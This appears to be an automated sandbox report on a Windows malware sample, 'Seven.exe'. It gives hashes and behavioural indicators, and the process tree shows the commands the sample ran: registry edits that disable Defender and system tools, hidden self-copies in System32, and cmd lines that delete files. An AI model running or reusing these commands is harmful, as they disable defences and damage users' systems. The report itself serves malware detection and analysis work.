Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
29/04/2024, 05:55
Static task
static1
Behavioral task
behavioral1
Sample
Seven.exe
Resource
win10v2004-20240426-en
General
-
Target
Seven.exe
-
Size
139KB
-
MD5
6503f847c3281ff85b304fc674b62580
-
SHA1
947536e0741c085f37557b7328b067ef97cb1a61
-
SHA256
afd7657f941024ef69ca34d1e61e640c5523b19b0fad4dcb1c9f1b01a6fa166f
-
SHA512
abc3b32a1cd7d0a60dd7354a9fcdff0bc37ec8a20bb2a8258353716d820f62d343c6ba9385ba893be0cca981bbb9ab4e189ccfeee6dd77cc0dc723e975532174
-
SSDEEP
3072:miS4omp03WQthI/9S3BZi08iRQ1G78IVn27bSfcJd8lto:miS4ompB9S3BZi0a1G78IVhcTct
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Seven.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Seven.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1" Seven.exe -
Blocks application from running via registry modification 1 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Seven.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Seven.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" Seven.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation kdmvcldlg.exe -
Executes dropped EXE 64 IoCs
pid Process 1368 kdmvcldlg.exe 3452 kdmvcldlg.exe 4820 kdmvcldlg.exe 8132 kdmvcldlg.exe 7648 kdmvcldlg.exe 5040 kdmvcldlg.exe 5808 kdmvcldlg.exe 5264 kdmvcldlg.exe 6056 kdmvcldlg.exe 2628 kdmvcldlg.exe 7064 kdmvcldlg.exe 7964 kdmvcldlg.exe 5548 kdmvcldlg.exe 7084 kdmvcldlg.exe 6968 kdmvcldlg.exe 7264 kdmvcldlg.exe 7000 kdmvcldlg.exe 7004 kdmvcldlg.exe 6572 kdmvcldlg.exe 7360 kdmvcldlg.exe 7436 kdmvcldlg.exe 15188 kdmvcldlg.exe 9296 kdmvcldlg.exe 8444 kdmvcldlg.exe 4676 kdmvcldlg.exe 9044 kdmvcldlg.exe 10248 kdmvcldlg.exe 10312 kdmvcldlg.exe 15748 kdmvcldlg.exe 11000 kdmvcldlg.exe 15296 kdmvcldlg.exe 15336 kdmvcldlg.exe 11440 kdmvcldlg.exe 10724 kdmvcldlg.exe 15604 kdmvcldlg.exe 15420 kdmvcldlg.exe 9224 kdmvcldlg.exe 1064 kdmvcldlg.exe 15884 kdmvcldlg.exe 8828 kdmvcldlg.exe 7016 kdmvcldlg.exe 13408 kdmvcldlg.exe 3988 kdmvcldlg.exe 16228 kdmvcldlg.exe 748 kdmvcldlg.exe 15940 kdmvcldlg.exe 9536 kdmvcldlg.exe 16296 kdmvcldlg.exe 16828 kdmvcldlg.exe 16720 kdmvcldlg.exe 16520 kdmvcldlg.exe 15908 kdmvcldlg.exe 10044 kdmvcldlg.exe 13512 kdmvcldlg.exe 10896 kdmvcldlg.exe 14984 kdmvcldlg.exe 15240 kdmvcldlg.exe 13196 kdmvcldlg.exe 11604 kdmvcldlg.exe 14884 kdmvcldlg.exe 13192 kdmvcldlg.exe 14740 kdmvcldlg.exe 12172 kdmvcldlg.exe 13716 kdmvcldlg.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" Seven.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe -
Drops desktop.ini file(s) 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Music\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini kdmvcldlg.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini kdmvcldlg.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\EncryptedLog.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt kdmvcldlg.exe File created C:\Windows\system32\KeyAndIV.txt Process not Found File created C:\Windows\system32\EncryptedLog.txt Process not Found -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 18016 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4400 powershell.exe 4400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 18016 tasklist.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4948 wrote to memory of 4400 4948 Seven.exe 86 PID 4948 wrote to memory of 4400 4948 Seven.exe 86 PID 4948 wrote to memory of 4600 4948 Seven.exe 88 PID 4948 wrote to memory of 4600 4948 Seven.exe 88 PID 4948 wrote to memory of 3636 4948 Seven.exe 89 PID 4948 wrote to memory of 3636 4948 Seven.exe 89 PID 4948 wrote to memory of 1424 4948 Seven.exe 90 PID 4948 wrote to memory of 1424 4948 Seven.exe 90 PID 1424 wrote to memory of 4220 1424 cmd.exe 91 PID 1424 wrote to memory of 4220 1424 cmd.exe 91 PID 4948 wrote to memory of 1940 4948 Seven.exe 92 PID 4948 wrote to memory of 1940 4948 Seven.exe 92 PID 4948 wrote to memory of 4876 4948 Seven.exe 93 PID 4948 wrote to memory of 4876 4948 Seven.exe 93 PID 4948 wrote to memory of 2156 4948 Seven.exe 94 PID 4948 wrote to memory of 2156 4948 Seven.exe 94 PID 4948 wrote to memory of 3936 4948 Seven.exe 95 PID 4948 wrote to memory of 3936 4948 Seven.exe 95 PID 2156 wrote to memory of 1696 2156 cmd.exe 96 PID 2156 wrote to memory of 1696 2156 cmd.exe 96 PID 3936 wrote to memory of 5100 3936 cmd.exe 97 PID 3936 wrote to memory of 5100 3936 cmd.exe 97 PID 4948 wrote to memory of 1368 4948 Seven.exe 98 PID 4948 wrote to memory of 1368 4948 Seven.exe 98 PID 1368 wrote to memory of 220 1368 kdmvcldlg.exe 99 PID 1368 wrote to memory of 220 1368 kdmvcldlg.exe 99 PID 1368 wrote to memory of 736 1368 kdmvcldlg.exe 101 PID 1368 wrote to memory of 736 1368 kdmvcldlg.exe 101 PID 1368 wrote to memory of 2420 1368 kdmvcldlg.exe 103 PID 1368 wrote to memory of 2420 1368 kdmvcldlg.exe 103 PID 1368 wrote to memory of 228 1368 kdmvcldlg.exe 105 PID 1368 wrote to memory of 228 1368 kdmvcldlg.exe 105 PID 1368 wrote to memory of 1700 1368 kdmvcldlg.exe 106 PID 1368 wrote to memory of 1700 1368 kdmvcldlg.exe 106 PID 1368 wrote to memory of 4372 1368 kdmvcldlg.exe 107 PID 1368 wrote to memory of 4372 1368 kdmvcldlg.exe 107 PID 1368 wrote to memory of 4732 1368 kdmvcldlg.exe 109 PID 1368 wrote to memory of 4732 1368 kdmvcldlg.exe 109 PID 1368 wrote to memory of 4472 1368 kdmvcldlg.exe 110 PID 1368 wrote to memory of 4472 1368 kdmvcldlg.exe 110 PID 1368 wrote to memory of 3852 1368 kdmvcldlg.exe 112 PID 1368 wrote to memory of 3852 1368 kdmvcldlg.exe 112 PID 1368 wrote to memory of 2908 1368 kdmvcldlg.exe 117 PID 1368 wrote to memory of 2908 1368 kdmvcldlg.exe 117 PID 1368 wrote to memory of 2336 1368 kdmvcldlg.exe 118 PID 1368 wrote to memory of 2336 1368 kdmvcldlg.exe 118 PID 1368 wrote to memory of 4816 1368 kdmvcldlg.exe 119 PID 1368 wrote to memory of 4816 1368 kdmvcldlg.exe 119 PID 736 wrote to memory of 4568 736 cmd.exe 123 PID 736 wrote to memory of 4568 736 cmd.exe 123 PID 3852 wrote to memory of 2384 3852 cmd.exe 125 PID 3852 wrote to memory of 2384 3852 cmd.exe 125 PID 220 wrote to memory of 4800 220 cmd.exe 121 PID 220 wrote to memory of 4800 220 cmd.exe 121 PID 1368 wrote to memory of 3424 1368 kdmvcldlg.exe 122 PID 1368 wrote to memory of 3424 1368 kdmvcldlg.exe 122 PID 1368 wrote to memory of 4040 1368 kdmvcldlg.exe 127 PID 1368 wrote to memory of 4040 1368 kdmvcldlg.exe 127 PID 1368 wrote to memory of 384 1368 kdmvcldlg.exe 128 PID 1368 wrote to memory of 384 1368 kdmvcldlg.exe 128 PID 1368 wrote to memory of 2172 1368 kdmvcldlg.exe 129 PID 1368 wrote to memory of 2172 1368 kdmvcldlg.exe 129 PID 2420 wrote to memory of 4512 2420 cmd.exe 134 PID 2420 wrote to memory of 4512 2420 cmd.exe 134 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1" Seven.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4220 attrib.exe 1696 attrib.exe 5100 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Seven.exe"C:\Users\Admin\AppData\Local\Temp\Seven.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Users\Admin\AppData\Local\Temp\kdmvcldlg.exe2⤵PID:4600
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Windows\System32\kdmvcldlg.exe2⤵PID:3636
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\kdmvcldlg.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\kdmvcldlg.exe3⤵
- Views/modifies file attributes
PID:4220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.dll C:\Windows\System32\Seven.dll2⤵PID:1940
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.runtimeconfig.json C:\Windows\System32\Seven.runtimeconfig.json2⤵PID:4876
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.dll3⤵
- Views/modifies file attributes
PID:1696
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.runtimeconfig.json2⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.runtimeconfig.json3⤵
- Views/modifies file attributes
PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\kdmvcldlg.exe"C:\Users\Admin\AppData\Local\Temp\kdmvcldlg.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt"3⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4800
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log.html"3⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4568
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt"3⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4512
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log.html"3⤵PID:228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4376
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log"3⤵PID:1700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2924
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log"3⤵PID:4372
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4336
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log"3⤵PID:4732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4104
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log"3⤵PID:4472
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2204
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log"3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2384
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log"3⤵PID:2908
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1112
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log"3⤵PID:2336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:716
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log"3⤵PID:4816
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4444
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log"3⤵PID:3424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4464
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log"3⤵PID:4040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1964
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_000_vcRuntimeMinimum_x86.log"3⤵PID:384
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:928
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_001_vcRuntimeAdditional_x86.log"3⤵PID:2172
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4844
-
